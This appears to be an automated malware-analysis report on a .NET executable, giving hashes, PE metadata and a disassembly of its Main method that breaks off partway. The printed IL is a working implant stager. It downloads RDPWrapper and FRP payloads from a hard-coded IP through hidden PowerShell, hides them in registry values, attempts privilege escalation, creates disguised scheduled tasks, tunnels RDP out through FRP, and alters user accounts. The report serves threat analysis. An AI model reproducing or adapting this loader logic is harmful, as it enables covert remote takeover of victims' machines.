ec5feaf68695c6cb51efbf737a240f62
PE Executable | MD5: ec5feaf68695c6cb51efbf737a240f62 | Size: 23.55 KB | application/x-dosexec
Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | ec5feaf68695c6cb51efbf737a240f62
|
| Sha1 | efd58a42ed9e121476535e91df59543464d6d067
|
| Sha256 | 41a99b0b2be00bc85f875c310dea544492e54889414c8c45b951d3dbdd58c270
|
| Sha384 | 24d01f508487c33d06af7870872618f21c67911d5e53fac0c67819d392487fab37c90ee79ba29c273fbba6ec2e82e149
|
| Sha512 | 795c902ab9320a831fb39da3571909cf1ace17eb7a65742ced514c3cf6aeb5c0b11940d882bdb40e60b5156ff803c06cc41190848b91ec129bc2a48c1df97e60
|
| SSDeep | 384:T6aYyubblBlG0HIgyvdYR8AlaUL5yfgxDYOXD8acwS4L6:ivb1GWIgy6RTFNDYOXD8am
|
| TLSH | EDB23E01BBE80518F6FF5F3659B52A904A77BC9A2E35C55E0D42418E0C75BA0DEA0F37
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | vhhqjwoq.zfo.exe |
| Full Name | vhhqjwoq.zfo.exe |
| EntryPoint | System.Void StandaloneProgram.Program::Main() |
| Scope Name | vhhqjwoq.zfo.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v2.0.50727 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | vhhqjwoq.zfo |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 218 |
| Main Method | System.Void StandaloneProgram.Program::Main() |
| Main IL Instruction Count | 1155 |
| Main IL | ldnull <null> stloc.0 <null> call System.Int32 StandaloneProgram.Program::DetermineIntegrity() stsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un.s IL_001E: ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4 20000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt.s IL_0050: ldstr "C:\\Temp" ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> beq.s IL_0035: ldstr "Global\\SystemStagerMutex" ldstr Global\AdminStagerMutex br.s IL_003A: stloc.s V_7 ldstr Global\SystemStagerMutex stloc.s V_7 ldc.i4.1 <null> ldloc.s V_7 ldloca.s V_8 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc.0 <null> ldloc.s V_8 brtrue.s IL_0050: ldstr "C:\\Temp" leave IL_0D96: ret ldstr C:\Temp dup <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldstr log{0}.txt ldsfld System.Int32 StandaloneProgram.Program::integrity box System.Int32 call System.String System.String::Format(System.String,System.Object) call System.String System.IO.Path::Combine(System.String,System.String) stsfld System.String StandaloneProgram.Program::logFile ldstr Determined integrity level: {0} (4=SYSTEM,3=Admin,2=User) ldsfld System.Int32 StandaloneProgram.Program::integrity box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr http://185.102.115.146:81 stloc.1 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr http:// ldstr callvirt System.String System.String::Replace(System.String,System.String) ldstr https:// ldstr callvirt System.String System.String::Replace(System.String,System.String) ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 47 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> stloc.2 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr /hosted/RDPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.3 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr /hosted/FRPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_4 ldc.i4.0 <null> stloc.s V_5 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.0 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_10 ldloc.s V_10 brfalse.s IL_0162: leave.s IL_0170 ldloc.s V_10 ldstr IconSizeVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) brfalse.s IL_0162: leave.s IL_0170 ldc.i4.1 <null> stloc.s V_5 ldstr RDPWrapper already exists in HKLM, skipping download ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0170: ldloc.s V_5 ldloc.s V_10 brfalse.s IL_016F: endfinally ldloc.s V_10 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_5 brtrue IL_01FC: ldc.i4.0 ldstr Downloading RDPWrapper... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',$true).SetValue('IconSizeVersion1',(iwr ' ldloc.3 <null> ldstr ').Content,[Microsoft.Win32.RegistryValueKind]::Binary); call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_11 ldstr Running download command: ldloc.s V_11 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr powershell ldstr -w Hidden -Command " ldloc.s V_11 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() ldstr RDPWrapper downloaded to HKCU ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_01FC: ldc.i4.0 stloc.s V_12 ldstr Error downloading RDPWrapper: {0} ldloc.s V_12 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_01FC: ldc.i4.0 ldc.i4.0 <null> stloc.s V_6 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.0 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_13 ldloc.s V_13 brfalse.s IL_0231: leave.s IL_023F ldloc.s V_13 ldstr IconUnderlineVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) brfalse.s IL_0231: leave.s IL_023F ldc.i4.1 <null> stloc.s V_6 ldstr FRP binary already exists in HKLM, skipping download ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_023F: ldloc.s V_6 ldloc.s V_13 brfalse.s IL_023E: endfinally ldloc.s V_13 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_6 brtrue IL_02CC: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Downloading FRP binary... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',$true).SetValue('IconUnderlineVersion1',(iwr ' ldloc.s V_4 ldstr ').Content,[Microsoft.Win32.RegistryValueKind]::Binary); call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_14 ldstr Running FRP download command: ldloc.s V_14 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr powershell ldstr -w h -c " ldloc.s V_14 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() ldstr FRP binary downloaded to HKCU ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_02CC: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_15 ldstr Error downloading FRP binary: {0} ldloc.s V_15 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_02CC: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.2 <null> bne.un.s IL_0319: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Not admin/system, escalating privileges... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) call System.Diagnostics.Process StandaloneProgram.Program::RunAsAdmin(System.String) pop <null> ldstr Escalation attempted ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0D96: ret stloc.s V_16 ldstr Error in escalation: {0} ldloc.s V_16 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0D96: ret ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt IL_04EE: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_17 ldloc.s V_17 brfalse.s IL_0396: leave.s IL_03A4 ldloc.s V_17 ldstr ShellStateVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_18 ldloc.s V_18 brfalse.s IL_0396: leave.s IL_03A4 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_19 ldloc.s V_19 brfalse.s IL_0388: leave.s IL_0396 ldloc.s V_19 ldstr ShellStateVersion1 ldloc.s V_18 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_17 ldstr ShellStateVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved implant data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0396: leave.s IL_03A4 ldloc.s V_19 brfalse.s IL_0395: endfinally ldloc.s V_19 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_03A4: leave.s IL_03BC ldloc.s V_17 brfalse.s IL_03A3: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_03BC: nop stloc.s V_20 ldstr Error moving registry data: {0} ldloc.s V_20 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_03BC: nop nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_21 ldloc.s V_21 brfalse.s IL_042F: leave.s IL_043D ldloc.s V_21 ldstr IconSizeVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_22 ldloc.s V_22 brfalse.s IL_042F: leave.s IL_043D ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_23 ldloc.s V_23 brfalse.s IL_0421: leave.s IL_042F ldloc.s V_23 ldstr IconSizeVersion1 ldloc.s V_22 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_21 ldstr IconSizeVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved RDPWrapper data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_042F: leave.s IL_043D ldloc.s V_23 brfalse.s IL_042E: endfinally ldloc.s V_23 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_043D: leave.s IL_0455 ldloc.s V_21 brfalse.s IL_043C: endfinally ldloc.s V_21 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0455: nop stloc.s V_24 ldstr Error moving RDPWrapper data: {0} ldloc.s V_24 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0455: nop nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_25 ldloc.s V_25 brfalse.s IL_04C8: leave.s IL_04D6 ldloc.s V_25 ldstr IconUnderlineVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_26 ldloc.s V_26 brfalse.s IL_04C8: leave.s IL_04D6 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_27 ldloc.s V_27 brfalse.s IL_04BA: leave.s IL_04C8 ldloc.s V_27 ldstr IconUnderlineVersion1 ldloc.s V_26 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_25 ldstr IconUnderlineVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved FRP data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_04C8: leave.s IL_04D6 ldloc.s V_27 brfalse.s IL_04C7: endfinally ldloc.s V_27 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_04D6: leave.s IL_04EE ldloc.s V_25 brfalse.s IL_04D5: endfinally ldloc.s V_25 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_04EE: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_28 ldstr Error moving FRP data: {0} ldloc.s V_28 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_04EE: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt IL_05A9: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr C:\ProgramData\frp stloc.s V_29 ldloc.s V_29 ldstr frpc.toml call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_30 ldloc.s V_29 call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_053E: ldloc.s V_30 ldloc.s V_29 call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.s V_29 newobj System.Void System.IO.DirectoryInfo::.ctor(System.String) dup <null> callvirt System.IO.FileAttributes System.IO.FileSystemInfo::get_Attributes() ldc.i4.2 <null> or <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) ldstr FRP directory created and hidden ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_30 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_0591: leave.s IL_05A9 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr serverAddr = " stelem.ref <null> dup <null> ldc.i4.1 <null> ldloc.2 <null> stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr " serverPort = 7000 loginFailExit = false auth = { method = "token", token = "ADAD" } user = " stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String System.Environment::get_UserName() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " [[proxies]] name = "rdp" type = "tcp" localIP = "127.0.0.1" localPort = 3389 remotePort = 0 stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_31 ldloc.s V_30 ldloc.s V_31 callvirt System.String System.String::Trim() call System.Void System.IO.File::WriteAllText(System.String,System.String) ldstr FRP config created ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_05A9: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_32 ldstr Error setting up FRP: {0} ldloc.s V_32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_05A9: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_062F: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Admin detected, creating service... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.1 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) stloc.s V_33 ldstr DriverSvcTask ldstr Driver Support Service ldloc.s V_33 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr NetTcpSvc ldstr Manages network TCP connections for system services. ldc.i4.1 <null> ldstr IconUnderlineVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr TermSvcHost ldstr Provides support for Terminal Services. ldc.i4.1 <null> ldstr IconSizeVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) leave IL_06AF: nop stloc.s V_34 ldstr Error setting up autorun and task: {0} ldloc.s V_34 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_06AF: nop ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un.s IL_06AF: nop ldstr System detected, ensuring tasks exist... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.1 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) stloc.s V_35 ldstr DriverSvcTask ldstr Driver Support Service ldloc.s V_35 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr NetTcpSvc ldstr Manages network TCP connections for system services. ldc.i4.1 <null> ldstr IconUnderlineVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr TermSvcHost ldstr Provides support for Terminal Services. ldc.i4.1 <null> ldstr IconSizeVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) leave.s IL_06AF: nop stloc.s V_36 ldstr Error ensuring tasks exist: {0} ldloc.s V_36 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_06AF: nop nop <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.s V_37 ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_06D0: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_37 call System.String System.Environment::get_UserName() callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) br IL_075B: ldc.i4.0 ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un IL_075B: ldc.i4.0 ldstr S-1-5-32-555 call System.Collections.Generic.List`1<System.String> StandaloneProgram.Program::GetLocalGroupMembers(System.String) callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_41 br.s IL_0742: ldloca.s V_41 ldloca.s V_41 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_42 ldloc.s V_42 stloc.s V_43 ldloc.s V_42 ldc.i4.s 92 callvirt System.Int32 System.String::LastIndexOf(System.Char) stloc.s V_44 ldloc.s V_44 ldc.i4.0 <null> blt.s IL_0725: ldloc.s V_43 ldloc.s V_44 ldc.i4.1 <null> add <null> ldloc.s V_42 callvirt System.Int32 System.String::get_Length() bge.s IL_0725: ldloc.s V_43 ldloc.s V_42 ldloc.s V_44 ldc.i4.1 <null> add <null> callvirt System.String System.String::Substring(System.Int32) stloc.s V_43 ldloc.s V_43 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0742: ldloca.s V_41 ldloc.s V_37 ldloc.s V_43 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Contains(System.String) brtrue.s IL_0742: ldloca.s V_41 ldloc.s V_37 ldloc.s V_43 callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) ldloca.s V_41 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_06EE: ldloca.s V_41 leave.s IL_075B: ldc.i4.0 ldloca.s V_41 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.0 <null> stloc.s V_38 ldstr SysMaintenance stloc.s V_39 ldloc.s V_37 callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_41 br IL_09D5: ldloca.s V_41 ldloca.s V_41 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_45 ldstr Attempting to configure user: ldloc.s V_45 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr net ldstr user " ldloc.s V_45 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_46 ldloc.s V_46 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() ldloc.s V_46 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_39 callvirt System.Boolean System.String::Contains(System.String) brfalse.s IL_0806: leave.s IL_0814 ldstr Skipping user ldloc.s V_45 ldstr due to description containing ldloc.s V_39 call System.String System.String::Concat(System.String,System.String,System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_09D5: ldloca.s V_41 leave.s IL_0814: ldstr "net" ldloc.s V_46 brfalse.s IL_0813: endfinally ldloc.s V_46 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr net ldstr user " ldloc.s V_45 ldstr " "" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_47 ldloc.s V_47 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_48 ldloc.s V_47 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardError() callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_49 ldloc.s V_47 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr net user output: ldloc.s V_48 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr net user error: ldloc.s V_49 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_47 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() ldc.i4 8646 bne.un.s IL_08C0: ldloc.s V_47 ldstr Microsoft account detected, creating new local user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> stloc.s V_38 leave IL_09E1: leave.s IL_09F1 ldloc.s V_47 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() brfalse.s IL_08CE: leave.s IL_08DC leave IL_09D5: ldloca.s V_41 leave.s IL_08DC: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_47 brfalse.s IL_08DB: endfinally ldloc.s V_47 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_093D: ldstr "gpupdate" ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-555') -Member ' ldloc.s V_45 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_50 ldloc.s V_50 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_093D: ldstr "gpupdate" ldloc.s V_50 brfalse.s IL_093C: endfinally ldloc.s V_50 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr gpupdate ldstr /force newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 